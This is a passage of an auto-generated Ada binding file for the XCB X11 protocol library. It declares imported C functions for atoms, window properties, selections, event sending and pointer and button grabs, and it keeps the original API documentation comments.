* @brief Get atom identifier by name -- * -- * @param c The connection -- * @param only_if_exists Return a valid atom id only if the atom already exists. -- * @param name_len The length of the following \a name. -- * @param name The name of the atom. -- * @return A cookie -- * -- * Retrieves the identifier (xcb_atom_t TODO) for the atom with the specified -- * name. Atoms are used in protocols like EWMH, for example to store window titles -- * (`_NET_WM_NAME` atom) as property of a window. -- * -- * If \a only_if_exists is 0, the atom will be created if it does not already exist. -- * If \a only_if_exists is 1, `XCB_ATOM_NONE` will be returned if the atom does -- * not yet exist. -- * -- * This form can be used only if the request will cause -- * a reply to be generated. Any returned error will be -- * placed in the event queue. -- function xcb_intern_atom_unchecked (c : access xcb.xcb_connection_t; only_if_exists : bits_stdint_uintn_h.uint8_t; name_len : bits_stdint_uintn_h.uint16_t; name : Interfaces.C.Strings.chars_ptr) return xcb_intern_atom_cookie_t -- /usr/include/xcb/xproto.h:6704 with Import => True, Convention => C, External_Name => "xcb_intern_atom_unchecked"; --* -- * Return the reply -- * @param c The connection -- * @param cookie The cookie -- * @param e The xcb_generic_error_t supplied -- * -- * Returns the reply of the request asked by -- * -- * The parameter @p e supplied to this function must be NULL if -- * xcb_intern_atom_unchecked(). is used. -- * Otherwise, it stores the error if any. -- * -- * The returned value must be freed by the caller using free(). -- function xcb_intern_atom_reply (c : access xcb.xcb_connection_t; cookie : xcb_intern_atom_cookie_t; e : System.Address) return access xcb_intern_atom_reply_t -- /usr/include/xcb/xproto.h:6724 with Import => True, Convention => C, External_Name => "xcb_intern_atom_reply"; --*< function xcb_get_atom_name_sizeof (u_buffer : System.Address) return int -- /usr/include/xcb/xproto.h:6729 with Import => True, Convention => C, External_Name => "xcb_get_atom_name_sizeof"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_get_atom_name (c : access xcb.xcb_connection_t; atom : xcb_atom_t) return xcb_get_atom_name_cookie_t -- /usr/include/xcb/xproto.h:6740 with Import => True, Convention => C, External_Name => "xcb_get_atom_name"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will cause -- * a reply to be generated. Any returned error will be -- * placed in the event queue. -- function xcb_get_atom_name_unchecked (c : access xcb.xcb_connection_t; atom : xcb_atom_t) return xcb_get_atom_name_cookie_t -- /usr/include/xcb/xproto.h:6755 with Import => True, Convention => C, External_Name => "xcb_get_atom_name_unchecked"; function xcb_get_atom_name_name (R : access constant xcb_get_atom_name_reply_t) return Interfaces.C.Strings.chars_ptr -- /usr/include/xcb/xproto.h:6759 with Import => True, Convention => C, External_Name => "xcb_get_atom_name_name"; function xcb_get_atom_name_name_length (R : access constant xcb_get_atom_name_reply_t) return int -- /usr/include/xcb/xproto.h:6762 with Import => True, Convention => C, External_Name => "xcb_get_atom_name_name_length"; function xcb_get_atom_name_name_end (R : access constant xcb_get_atom_name_reply_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:6765 with Import => True, Convention => C, External_Name => "xcb_get_atom_name_name_end"; --* -- * Return the reply -- * @param c The connection -- * @param cookie The cookie -- * @param e The xcb_generic_error_t supplied -- * -- * Returns the reply of the request asked by -- * -- * The parameter @p e supplied to this function must be NULL if -- * xcb_get_atom_name_unchecked(). is used. -- * Otherwise, it stores the error if any. -- * -- * The returned value must be freed by the caller using free(). -- function xcb_get_atom_name_reply (c : access xcb.xcb_connection_t; cookie : xcb_get_atom_name_cookie_t; e : System.Address) return access xcb_get_atom_name_reply_t -- /usr/include/xcb/xproto.h:6782 with Import => True, Convention => C, External_Name => "xcb_get_atom_name_reply"; --*< function xcb_change_property_sizeof (u_buffer : System.Address) return int -- /usr/include/xcb/xproto.h:6787 with Import => True, Convention => C, External_Name => "xcb_change_property_sizeof"; --* -- * @brief Changes a window property -- * -- * @param c The connection -- * @param mode A bitmask of #xcb_prop_mode_t values. -- * @param mode \n -- * @param window The window whose property you want to change. -- * @param property The property you want to change (an atom). -- * @param type The type of the property you want to change (an atom). -- * @param format Specifies whether the data should be viewed as a list of 8-bit, 16-bit or -- * 32-bit quantities. Possible values are 8, 16 and 32. This information allows -- * the X server to correctly perform byte-swap operations as necessary. -- * @param data_len Specifies the number of elements (see \a format). -- * @param data The property data. -- * @return A cookie -- * -- * Sets or updates a property on the specified \a window. Properties are for -- * example the window title (`WM_NAME`) or its minimum size (`WM_NORMAL_HINTS`). -- * Protocols such as EWMH also use properties - for example EWMH defines the -- * window title, encoded as UTF-8 string, in the `_NET_WM_NAME` property. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_change_property_checked (c : access xcb.xcb_connection_t; mode : bits_stdint_uintn_h.uint8_t; window : xcb_window_t; property : xcb_atom_t; c_type : xcb_atom_t; format : bits_stdint_uintn_h.uint8_t; data_len : bits_stdint_uintn_h.uint32_t; data : System.Address) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:6815 with Import => True, Convention => C, External_Name => "xcb_change_property_checked"; --* -- * @brief Changes a window property -- * -- * @param c The connection -- * @param mode A bitmask of #xcb_prop_mode_t values. -- * @param mode \n -- * @param window The window whose property you want to change. -- * @param property The property you want to change (an atom). -- * @param type The type of the property you want to change (an atom). -- * @param format Specifies whether the data should be viewed as a list of 8-bit, 16-bit or -- * 32-bit quantities. Possible values are 8, 16 and 32. This information allows -- * the X server to correctly perform byte-swap operations as necessary. -- * @param data_len Specifies the number of elements (see \a format). -- * @param data The property data. -- * @return A cookie -- * -- * Sets or updates a property on the specified \a window. Properties are for -- * example the window title (`WM_NAME`) or its minimum size (`WM_NORMAL_HINTS`). -- * Protocols such as EWMH also use properties - for example EWMH defines the -- * window title, encoded as UTF-8 string, in the `_NET_WM_NAME` property. -- * -- function xcb_change_property (c : access xcb.xcb_connection_t; mode : bits_stdint_uintn_h.uint8_t; window : xcb_window_t; property : xcb_atom_t; c_type : xcb_atom_t; format : bits_stdint_uintn_h.uint8_t; data_len : bits_stdint_uintn_h.uint32_t; data : System.Address) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:6847 with Import => True, Convention => C, External_Name => "xcb_change_property"; function xcb_change_property_data (R : access constant xcb_change_property_request_t) return System.Address -- /usr/include/xcb/xproto.h:6857 with Import => True, Convention => C, External_Name => "xcb_change_property_data"; function xcb_change_property_data_length (R : access constant xcb_change_property_request_t) return int -- /usr/include/xcb/xproto.h:6860 with Import => True, Convention => C, External_Name => "xcb_change_property_data_length"; function xcb_change_property_data_end (R : access constant xcb_change_property_request_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:6863 with Import => True, Convention => C, External_Name => "xcb_change_property_data_end"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_delete_property_checked (c : access xcb.xcb_connection_t; window : xcb_window_t; property : xcb_atom_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:6877 with Import => True, Convention => C, External_Name => "xcb_delete_property_checked"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_delete_property (c : access xcb.xcb_connection_t; window : xcb_window_t; property : xcb_atom_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:6890 with Import => True, Convention => C, External_Name => "xcb_delete_property"; function xcb_get_property_sizeof (u_buffer : System.Address) return int -- /usr/include/xcb/xproto.h:6895 with Import => True, Convention => C, External_Name => "xcb_get_property_sizeof"; --* -- * @brief Gets a window property -- * -- * @param c The connection -- * @param _delete Whether the property should actually be deleted. For deleting a property, the -- * specified \a type has to match the actual property type. -- * @param window The window whose property you want to get. -- * @param property The property you want to get (an atom). -- * @param type The type of the property you want to get (an atom). -- * @param long_offset Specifies the offset (in 32-bit multiples) in the specified property where the -- * data is to be retrieved. -- * @param long_length Specifies how many 32-bit multiples of data should be retrieved (e.g. if you -- * set \a long_length to 4, you will receive 16 bytes of data). -- * @return A cookie -- * -- * Gets the specified \a property from the specified \a window. Properties are for -- * example the window title (`WM_NAME`) or its minimum size (`WM_NORMAL_HINTS`). -- * Protocols such as EWMH also use properties - for example EWMH defines the -- * window title, encoded as UTF-8 string, in the `_NET_WM_NAME` property. -- * -- * TODO: talk about \a type -- * -- * TODO: talk about `delete` -- * -- * TODO: talk about the offset/length thing. what's a valid use case? -- * -- function xcb_get_property (c : access xcb.xcb_connection_t; u_delete : bits_stdint_uintn_h.uint8_t; window : xcb_window_t; property : xcb_atom_t; c_type : xcb_atom_t; long_offset : bits_stdint_uintn_h.uint32_t; long_length : bits_stdint_uintn_h.uint32_t) return xcb_get_property_cookie_t -- /usr/include/xcb/xproto.h:6925 with Import => True, Convention => C, External_Name => "xcb_get_property"; --* -- * @brief Gets a window property -- * -- * @param c The connection -- * @param _delete Whether the property should actually be deleted. For deleting a property, the -- * specified \a type has to match the actual property type. -- * @param window The window whose property you want to get. -- * @param property The property you want to get (an atom). -- * @param type The type of the property you want to get (an atom). -- * @param long_offset Specifies the offset (in 32-bit multiples) in the specified property where the -- * data is to be retrieved. -- * @param long_length Specifies how many 32-bit multiples of data should be retrieved (e.g. if you -- * set \a long_length to 4, you will receive 16 bytes of data). -- * @return A cookie -- * -- * Gets the specified \a property from the specified \a window. Properties are for -- * example the window title (`WM_NAME`) or its minimum size (`WM_NORMAL_HINTS`). -- * Protocols such as EWMH also use properties - for example EWMH defines the -- * window title, encoded as UTF-8 string, in the `_NET_WM_NAME` property. -- * -- * TODO: talk about \a type -- * -- * TODO: talk about `delete` -- * -- * TODO: talk about the offset/length thing. what's a valid use case? -- * -- * This form can be used only if the request will cause -- * a reply to be generated. Any returned error will be -- * placed in the event queue. -- function xcb_get_property_unchecked (c : access xcb.xcb_connection_t; u_delete : bits_stdint_uintn_h.uint8_t; window : xcb_window_t; property : xcb_atom_t; c_type : xcb_atom_t; long_offset : bits_stdint_uintn_h.uint32_t; long_length : bits_stdint_uintn_h.uint32_t) return xcb_get_property_cookie_t -- /usr/include/xcb/xproto.h:6964 with Import => True, Convention => C, External_Name => "xcb_get_property_unchecked"; function xcb_get_property_value (R : access constant xcb_get_property_reply_t) return System.Address -- /usr/include/xcb/xproto.h:6973 with Import => True, Convention => C, External_Name => "xcb_get_property_value"; function xcb_get_property_value_length (R : access constant xcb_get_property_reply_t) return int -- /usr/include/xcb/xproto.h:6976 with Import => True, Convention => C, External_Name => "xcb_get_property_value_length"; function xcb_get_property_value_end (R : access constant xcb_get_property_reply_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:6979 with Import => True, Convention => C, External_Name => "xcb_get_property_value_end"; --* -- * Return the reply -- * @param c The connection -- * @param cookie The cookie -- * @param e The xcb_generic_error_t supplied -- * -- * Returns the reply of the request asked by -- * -- * The parameter @p e supplied to this function must be NULL if -- * xcb_get_property_unchecked(). is used. -- * Otherwise, it stores the error if any. -- * -- * The returned value must be freed by the caller using free(). -- function xcb_get_property_reply (c : access xcb.xcb_connection_t; cookie : xcb_get_property_cookie_t; e : System.Address) return access xcb_get_property_reply_t -- /usr/include/xcb/xproto.h:6996 with Import => True, Convention => C, External_Name => "xcb_get_property_reply"; --*< function xcb_list_properties_sizeof (u_buffer : System.Address) return int -- /usr/include/xcb/xproto.h:7001 with Import => True, Convention => C, External_Name => "xcb_list_properties_sizeof"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_list_properties (c : access xcb.xcb_connection_t; window : xcb_window_t) return xcb_list_properties_cookie_t -- /usr/include/xcb/xproto.h:7012 with Import => True, Convention => C, External_Name => "xcb_list_properties"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will cause -- * a reply to be generated. Any returned error will be -- * placed in the event queue. -- function xcb_list_properties_unchecked (c : access xcb.xcb_connection_t; window : xcb_window_t) return xcb_list_properties_cookie_t -- /usr/include/xcb/xproto.h:7027 with Import => True, Convention => C, External_Name => "xcb_list_properties_unchecked"; function xcb_list_properties_atoms (R : access constant xcb_list_properties_reply_t) return access xcb_atom_t -- /usr/include/xcb/xproto.h:7031 with Import => True, Convention => C, External_Name => "xcb_list_properties_atoms"; function xcb_list_properties_atoms_length (R : access constant xcb_list_properties_reply_t) return int -- /usr/include/xcb/xproto.h:7034 with Import => True, Convention => C, External_Name => "xcb_list_properties_atoms_length"; function xcb_list_properties_atoms_end (R : access constant xcb_list_properties_reply_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:7037 with Import => True, Convention => C, External_Name => "xcb_list_properties_atoms_end"; --* -- * Return the reply -- * @param c The connection -- * @param cookie The cookie -- * @param e The xcb_generic_error_t supplied -- * -- * Returns the reply of the request asked by -- * -- * The parameter @p e supplied to this function must be NULL if -- * xcb_list_properties_unchecked(). is used. -- * Otherwise, it stores the error if any. -- * -- * The returned value must be freed by the caller using free(). -- function xcb_list_properties_reply (c : access xcb.xcb_connection_t; cookie : xcb_list_properties_cookie_t; e : System.Address) return access xcb_list_properties_reply_t -- /usr/include/xcb/xproto.h:7054 with Import => True, Convention => C, External_Name => "xcb_list_properties_reply"; --*< --* -- * @brief Sets the owner of a selection -- * -- * @param c The connection -- * @param owner The new owner of the selection. -- * \n -- * The special value `XCB_NONE` means that the selection will have no owner. -- * @param selection The selection. -- * @param time Timestamp to avoid race conditions when running X over the network. -- * \n -- * The selection will not be changed if \a time is earlier than the current -- * last-change time of the \a selection or is later than the current X server time. -- * Otherwise, the last-change time is set to the specified time. -- * \n -- * The special value `XCB_CURRENT_TIME` will be replaced with the current server -- * time. -- * @return A cookie -- * -- * Makes `window` the owner of the selection \a selection and updates the -- * last-change time of the specified selection. -- * -- * TODO: briefly explain what a selection is. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_set_selection_owner_checked (c : access xcb.xcb_connection_t; owner : xcb_window_t; selection : xcb_atom_t; time : xcb_timestamp_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:7086 with Import => True, Convention => C, External_Name => "xcb_set_selection_owner_checked"; --* -- * @brief Sets the owner of a selection -- * -- * @param c The connection -- * @param owner The new owner of the selection. -- * \n -- * The special value `XCB_NONE` means that the selection will have no owner. -- * @param selection The selection. -- * @param time Timestamp to avoid race conditions when running X over the network. -- * \n -- * The selection will not be changed if \a time is earlier than the current -- * last-change time of the \a selection or is later than the current X server time. -- * Otherwise, the last-change time is set to the specified time. -- * \n -- * The special value `XCB_CURRENT_TIME` will be replaced with the current server -- * time. -- * @return A cookie -- * -- * Makes `window` the owner of the selection \a selection and updates the -- * last-change time of the specified selection. -- * -- * TODO: briefly explain what a selection is. -- * -- function xcb_set_selection_owner (c : access xcb.xcb_connection_t; owner : xcb_window_t; selection : xcb_atom_t; time : xcb_timestamp_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:7116 with Import => True, Convention => C, External_Name => "xcb_set_selection_owner"; --* -- * @brief Gets the owner of a selection -- * -- * @param c The connection -- * @param selection The selection. -- * @return A cookie -- * -- * Gets the owner of the specified selection. -- * -- * TODO: briefly explain what a selection is. -- * -- function xcb_get_selection_owner (c : access xcb.xcb_connection_t; selection : xcb_atom_t) return xcb_get_selection_owner_cookie_t -- /usr/include/xcb/xproto.h:7134 with Import => True, Convention => C, External_Name => "xcb_get_selection_owner"; --* -- * @brief Gets the owner of a selection -- * -- * @param c The connection -- * @param selection The selection. -- * @return A cookie -- * -- * Gets the owner of the specified selection. -- * -- * TODO: briefly explain what a selection is. -- * -- * This form can be used only if the request will cause -- * a reply to be generated. Any returned error will be -- * placed in the event queue. -- function xcb_get_selection_owner_unchecked (c : access xcb.xcb_connection_t; selection : xcb_atom_t) return xcb_get_selection_owner_cookie_t -- /usr/include/xcb/xproto.h:7153 with Import => True, Convention => C, External_Name => "xcb_get_selection_owner_unchecked"; --* -- * Return the reply -- * @param c The connection -- * @param cookie The cookie -- * @param e The xcb_generic_error_t supplied -- * -- * Returns the reply of the request asked by -- * -- * The parameter @p e supplied to this function must be NULL if -- * xcb_get_selection_owner_unchecked(). is used. -- * Otherwise, it stores the error if any. -- * -- * The returned value must be freed by the caller using free(). -- function xcb_get_selection_owner_reply (c : access xcb.xcb_connection_t; cookie : xcb_get_selection_owner_cookie_t; e : System.Address) return access xcb_get_selection_owner_reply_t -- /usr/include/xcb/xproto.h:7171 with Import => True, Convention => C, External_Name => "xcb_get_selection_owner_reply"; --*< --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_convert_selection_checked (c : access xcb.xcb_connection_t; requestor : xcb_window_t; selection : xcb_atom_t; target : xcb_atom_t; property : xcb_atom_t; time : xcb_timestamp_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:7187 with Import => True, Convention => C, External_Name => "xcb_convert_selection_checked"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_convert_selection (c : access xcb.xcb_connection_t; requestor : xcb_window_t; selection : xcb_atom_t; target : xcb_atom_t; property : xcb_atom_t; time : xcb_timestamp_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:7203 with Import => True, Convention => C, External_Name => "xcb_convert_selection"; --* -- * @brief send an event -- * -- * @param c The connection -- * @param propagate If \a propagate is true and no clients have selected any event on \a destination, -- * the destination is replaced with the closest ancestor of \a destination for -- * which some client has selected a type in \a event_mask and for which no -- * intervening window has that type in its do-not-propagate-mask. If no such -- * window exists or if the window is an ancestor of the focus window and -- * `InputFocus` was originally specified as the destination, the event is not sent -- * to any clients. Otherwise, the event is reported to every client selecting on -- * the final destination any of the types specified in \a event_mask. -- * @param destination The window to send this event to. Every client which selects any event within -- * \a event_mask on \a destination will get the event. -- * \n -- * The special value `XCB_SEND_EVENT_DEST_POINTER_WINDOW` refers to the window -- * that contains the mouse pointer. -- * \n -- * The special value `XCB_SEND_EVENT_DEST_ITEM_FOCUS` refers to the window which -- * has the keyboard focus. -- * @param event_mask Event_mask for determining which clients should receive the specified event. -- * See \a destination and \a propagate. -- * @param event The event to send to the specified \a destination. -- * @return A cookie -- * -- * Identifies the \a destination window, determines which clients should receive -- * the specified event and ignores any active grabs. -- * -- * The \a event must be one of the core events or an event defined by an extension, -- * so that the X server can correctly byte-swap the contents as necessary. The -- * contents of \a event are otherwise unaltered and unchecked except for the -- * `send_event` field which is forced to 'true'. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_send_event_checked (c : access xcb.xcb_connection_t; propagate : bits_stdint_uintn_h.uint8_t; destination : xcb_window_t; event_mask : bits_stdint_uintn_h.uint32_t; event : Interfaces.C.Strings.chars_ptr) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:7248 with Import => True, Convention => C, External_Name => "xcb_send_event_checked"; --* -- * @brief send an event -- * -- * @param c The connection -- * @param propagate If \a propagate is true and no clients have selected any event on \a destination, -- * the destination is replaced with the closest ancestor of \a destination for -- * which some client has selected a type in \a event_mask and for which no -- * intervening window has that type in its do-not-propagate-mask. If no such -- * window exists or if the window is an ancestor of the focus window and -- * `InputFocus` was originally specified as the destination, the event is not sent -- * to any clients. Otherwise, the event is reported to every client selecting on -- * the final destination any of the types specified in \a event_mask. -- * @param destination The window to send this event to. Every client which selects any event within -- * \a event_mask on \a destination will get the event. -- * \n -- * The special value `XCB_SEND_EVENT_DEST_POINTER_WINDOW` refers to the window -- * that contains the mouse pointer. -- * \n -- * The special value `XCB_SEND_EVENT_DEST_ITEM_FOCUS` refers to the window which -- * has the keyboard focus. -- * @param event_mask Event_mask for determining which clients should receive the specified event. -- * See \a destination and \a propagate. -- * @param event The event to send to the specified \a destination. -- * @return A cookie -- * -- * Identifies the \a destination window, determines which clients should receive -- * the specified event and ignores any active grabs. -- * -- * The \a event must be one of the core events or an event defined by an extension, -- * so that the X server can correctly byte-swap the contents as necessary. The -- * contents of \a event are otherwise unaltered and unchecked except for the -- * `send_event` field which is forced to 'true'. -- * -- function xcb_send_event (c : access xcb.xcb_connection_t; propagate : bits_stdint_uintn_h.uint8_t; destination : xcb_window_t; event_mask : bits_stdint_uintn_h.uint32_t; event : Interfaces.C.Strings.chars_ptr) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:7289 with Import => True, Convention => C, External_Name => "xcb_send_event"; --* -- * @brief Grab the pointer -- * -- * @param c The connection -- * @param owner_events If 1, the \a grab_window will still get the pointer events. If 0, events are not -- * reported to the \a grab_window. -- * @param grab_window Specifies the window on which the pointer should be grabbed. -- * @param event_mask Specifies which pointer events are reported to the client. -- * \n -- * TODO: which values? -- * @param pointer_mode A bitmask of #xcb_grab_mode_t values. -- * @param pointer_mode \n -- * @param keyboard_mode A bitmask of #xcb_grab_mode_t values. -- * @param keyboard_mode \n -- * @param confine_to Specifies the window to confine the pointer in (the user will not be able to -- * move the pointer out of that window). -- * \n -- * The special value `XCB_NONE` means don't confine the pointer. -- * @param cursor Specifies the cursor that should be displayed or `XCB_NONE` to not change the -- * cursor. -- * @param time The time argument allows you to avoid certain circumstances that come up if -- * applications take a long time to respond or if there are long network delays. -- * Consider a situation where you have two applications, both of which normally -- * grab the pointer when clicked on. If both applications specify the timestamp -- * from the event, the second application may wake up faster and successfully grab -- * the pointer before the first application. The first application then will get -- * an indication that the other application grabbed the pointer before its request -- * was processed. -- * \n -- * The special value `XCB_CURRENT_TIME` will be replaced with the current server -- * time. -- * @return A cookie -- * -- * Actively grabs control of the pointer. Further pointer events are reported only to the grabbing client. Overrides any active pointer grab by this client. -- * -- function xcb_grab_pointer (c : access xcb.xcb_connection_t; owner_events : bits_stdint_uintn_h.uint8_t; grab_window : xcb_window_t; event_mask : bits_stdint_uintn_h.uint16_t; pointer_mode : bits_stdint_uintn_h.uint8_t; keyboard_mode : bits_stdint_uintn_h.uint8_t; confine_to : xcb_window_t; cursor : xcb_cursor_t; time : xcb_timestamp_t) return xcb_grab_pointer_cookie_t -- /usr/include/xcb/xproto.h:7332 with Import => True, Convention => C, External_Name => "xcb_grab_pointer"; --* -- * @brief Grab the pointer -- * -- * @param c The connection -- * @param owner_events If 1, the \a grab_window will still get the pointer events. If 0, events are not -- * reported to the \a grab_window. -- * @param grab_window Specifies the window on which the pointer should be grabbed. -- * @param event_mask Specifies which pointer events are reported to the client. -- * \n -- * TODO: which values? -- * @param pointer_mode A bitmask of #xcb_grab_mode_t values. -- * @param pointer_mode \n -- * @param keyboard_mode A bitmask of #xcb_grab_mode_t values. -- * @param keyboard_mode \n -- * @param confine_to Specifies the window to confine the pointer in (the user will not be able to -- * move the pointer out of that window). -- * \n -- * The special value `XCB_NONE` means don't confine the pointer. -- * @param cursor Specifies the cursor that should be displayed or `XCB_NONE` to not change the -- * cursor. -- * @param time The time argument allows you to avoid certain circumstances that come up if -- * applications take a long time to respond or if there are long network delays. -- * Consider a situation where you have two applications, both of which normally -- * grab the pointer when clicked on. If both applications specify the timestamp -- * from the event, the second application may wake up faster and successfully grab -- * the pointer before the first application. The first application then will get -- * an indication that the other application grabbed the pointer before its request -- * was processed. -- * \n -- * The special value `XCB_CURRENT_TIME` will be replaced with the current server -- * time. -- * @return A cookie -- * -- * Actively grabs control of the pointer. Further pointer events are reported only to the grabbing client. Overrides any active pointer grab by this client. -- * -- * This form can be used only if the request will cause -- * a reply to be generated. Any returned error will be -- * placed in the event queue. -- function xcb_grab_pointer_unchecked (c : access xcb.xcb_connection_t; owner_events : bits_stdint_uintn_h.uint8_t; grab_window : xcb_window_t; event_mask : bits_stdint_uintn_h.uint16_t; pointer_mode : bits_stdint_uintn_h.uint8_t; keyboard_mode : bits_stdint_uintn_h.uint8_t; confine_to : xcb_window_t; cursor : xcb_cursor_t; time : xcb_timestamp_t) return xcb_grab_pointer_cookie_t -- /usr/include/xcb/xproto.h:7382 with Import => True, Convention => C, External_Name => "xcb_grab_pointer_unchecked"; --* -- * Return the reply -- * @param c The connection -- * @param cookie The cookie -- * @param e The xcb_generic_error_t supplied -- * -- * Returns the reply of the request asked by -- * -- * The parameter @p e supplied to this function must be NULL if -- * xcb_grab_pointer_unchecked(). is used. -- * Otherwise, it stores the error if any. -- * -- * The returned value must be freed by the caller using free(). -- function xcb_grab_pointer_reply (c : access xcb.xcb_connection_t; cookie : xcb_grab_pointer_cookie_t; e : System.Address) return access xcb_grab_pointer_reply_t -- /usr/include/xcb/xproto.h:7407 with Import => True, Convention => C, External_Name => "xcb_grab_pointer_reply"; --*< --* -- * @brief release the pointer -- * -- * @param c The connection -- * @param time Timestamp to avoid race conditions when running X over the network. -- * \n -- * The pointer will not be released if \a time is earlier than the -- * last-pointer-grab time or later than the current X server time. -- * @return A cookie -- * -- * Releases the pointer and any queued events if you actively grabbed the pointer -- * before using `xcb_grab_pointer`, `xcb_grab_button` or within a normal button -- * press. -- * -- * EnterNotify and LeaveNotify events are generated. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_ungrab_pointer_checked (c : access xcb.xcb_connection_t; time : xcb_timestamp_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:7432 with Import => True, Convention => C, External_Name => "xcb_ungrab_pointer_checked"; --* -- * @brief release the pointer -- * -- * @param c The connection -- * @param time Timestamp to avoid race conditions when running X over the network. -- * \n -- * The pointer will not be released if \a time is earlier than the -- * last-pointer-grab time or later than the current X server time. -- * @return A cookie -- * -- * Releases the pointer and any queued events if you actively grabbed the pointer -- * before using `xcb_grab_pointer`, `xcb_grab_button` or within a normal button -- * press. -- * -- * EnterNotify and LeaveNotify events are generated. -- * -- function xcb_ungrab_pointer (c : access xcb.xcb_connection_t; time : xcb_timestamp_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:7453 with Import => True, Convention => C, External_Name => "xcb_ungrab_pointer"; --* -- * @brief Grab pointer button(s) -- * -- * @param c The connection -- * @param owner_events If 1, the \a grab_window will still get the pointer events. If 0, events are not -- * reported to the \a grab_window. -- * @param grab_window Specifies the window on which the pointer should be grabbed. -- * @param event_mask Specifies which pointer events are reported to the client. -- * \n -- * TODO: which values? -- * @param pointer_mode A bitmask of #xcb_grab_mode_t values. -- * @param pointer_mode \n -- * @param keyboard_mode A bitmask of #xcb_grab_mode_t values. -- * @param keyboard_mode \n -- * @param confine_to Specifies the window to confine the pointer in (the user will not be able to -- * move the pointer out of that window). -- * \n -- * The special value `XCB_NONE` means don't confine the pointer. -- * @param cursor Specifies the cursor that should be displayed or `XCB_NONE` to not change the -- * cursor. -- * @param button A bitmask of #xcb_button_index_t values. -- * @param button \n -- * @param modifiers The modifiers to grab. -- * \n -- * Using the special value `XCB_MOD_MASK_ANY` means grab the pointer with all -- * possible modifier combinations. -- * @return A cookie -- * -- * This request establishes a passive grab. The pointer is actively grabbed as -- * described in GrabPointer, the last-pointer-grab time is set to the time at -- * which the button was pressed (as transmitted in the ButtonPress event), and the -- * ButtonPress event is reported if all of the following conditions are true: -- * -- * The pointer is not grabbed and the specified button is logically pressed when -- * the specified modifier keys are logically down, and no other buttons or -- * modifier keys are logically down. -- * -- * The grab-window contains the pointer. -- * -- * The confine-to window (if any) is viewable. -- * -- * A passive grab on the same button/key combination does not exist on any -- * ancestor of grab-window. -- * -- * The interpretation of the remaining arguments is the same as for GrabPointer. -- * The active grab is terminated automatically when the logical state of the -- * pointer has all buttons released, independent of the logical state of modifier -- * keys. Note that the logical state of a device (as seen by means of the -- * protocol) may lag the physical state if device event processing is frozen. This -- * request overrides all previous passive grabs by the same client on the same -- * button/key combinations on the same window. A modifier of AnyModifier is -- * equivalent to issuing the request for all possible modifier combinations -- * (including the combination of no modifiers). It is not required that all -- * specified modifiers have currently assigned keycodes. A button of AnyButton is -- * equivalent to issuing the request for all possible buttons. Otherwise, it is -- * not required that the button specified currently be assigned to a physical -- * button. -- * -- * An Access error is generated if some other client has already issued a -- * GrabButton request with the same button/key combination on the same window. -- * When using AnyModifier or AnyButton, the request fails completely (no grabs are -- * established), and an Access error is generated if there is a conflicting grab -- * for any combination. The request has no effect on an active grab. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_grab_button_checked (c : access xcb.xcb_connection_t; owner_events : bits_stdint_uintn_h.uint8_t; grab_window : xcb_window_t; event_mask : bits_stdint_uintn_h.uint16_t; pointer_mode : bits_stdint_uintn_h.uint8_t; keyboard_mode : bits_stdint_uintn_h.uint8_t; confine_to : xcb_window_t; cursor : xcb_cursor_t; button : bits_stdint_uintn_h.uint8_t; modifiers : bits_stdint_uintn_h.uint16_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:7525 with Import => True, Convention => C, External_Name => "xcb_grab_button_checked"; --* -- * @brief Grab pointer button(s) -- * -- * @param c The connection -- * @param owner_events If 1, the \a grab_window will still get the pointer events. If 0, events are not -- * reported to the \a grab_window. -- * @param grab_window Specifies the window on which the pointer should be grabbed. -- * @param event_mask Specifies which pointer events are reported to the client. -- * \n -- * TODO: which values? -- * @param pointer_mode A bitmask of #xcb_grab_mode_t values. -- * @param pointer_mode \n -- * @param keyboard_mode A bitmask of #xcb_grab_mode_t values. -- * @param keyboard_mode \n -- * @param confine_to Specifies the window to confine the pointer in (the user will not be able to -- * move the pointer out of that window). -- * \n -- * The special value `XCB_NONE` means don't confine the pointer. -- * @param cursor Specifies the cursor 